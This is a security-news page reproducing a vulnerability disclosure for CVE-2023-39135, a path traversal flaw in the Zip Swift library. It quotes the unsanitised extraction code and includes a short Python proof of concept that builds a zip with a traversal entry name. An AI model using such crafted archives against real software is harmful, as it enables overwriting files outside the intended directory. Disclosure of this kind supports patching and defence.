Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-39135: Path traversal vulnerability · Issue #245 · marmelroy/Zip

An issue in Zip Swift v2.1.2 allows attackers to execute a path traversal attack via a crafted zip entry.

CVE
#vulnerability

Description:

The package does not validate paths coming from zip entries, hence allowing for path traversal

Technical details:

Below is a code snippet from the unzipFile function used to extract zip files, you can notice that pathString coming from our zip entry is appended to the destination directory without any sanitization

let fileNameSize = Int(fileInfo.size_filename) + 1 //let fileName = UnsafeMutablePointer<CChar>(allocatingCapacity: fileNameSize) let fileName = UnsafeMutablePointer<CChar>.allocate(capacity: fileNameSize)

unzGetCurrentFileInfo64(zip, &fileInfo, fileName, UInt(fileNameSize), nil, 0, nil, 0) fileName[Int(fileInfo.size_filename)] = 0

var pathString = String(cString: fileName)

guard pathString.count > 0 else { throw ZipError.unzipFail }

var isDirectory = false let fileInfoSizeFileName = Int(fileInfo.size_filename-1) if (fileName[fileInfoSizeFileName] == "/".cString(using: String.Encoding.utf8)?.first || fileName[fileInfoSizeFileName] == "\\".cString(using: String.Encoding.utf8)?.first) { isDirectory = true; } free(fileName) if pathString.rangeOfCharacter(from: CharacterSet(charactersIn: “/\\”)) != nil { pathString = pathString.replacingOccurrences(of: "\\", with: “/”) }

let fullPath = destination.appendingPathComponent(pathString).path

Exploit code:

import zipfile

def compress_file(filename): with zipfile.ZipFile('payload.zip’, ‘w’) as zipf: zipf.writestr(filename, “Test payload”)

filename = ‘…/secret.txt’

compress_file(filename)

Related news

GHSA-g454-wj9r-jpg4: Path traversal in Zip Swift

An issue in Zip Swift v2.1.2 allows attackers to execute a path traversal attack via a crafted zip entry.

CVE-2023-39139: Ostorlab: Mobile App Security Testing for Android and iOS

An issue in Archive v3.3.7 allows attackers to execute a path traversal via extracting a crafted zip file.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE-2023-6905
CVE-2023-6903
CVE-2023-6904
CVE-2023-3907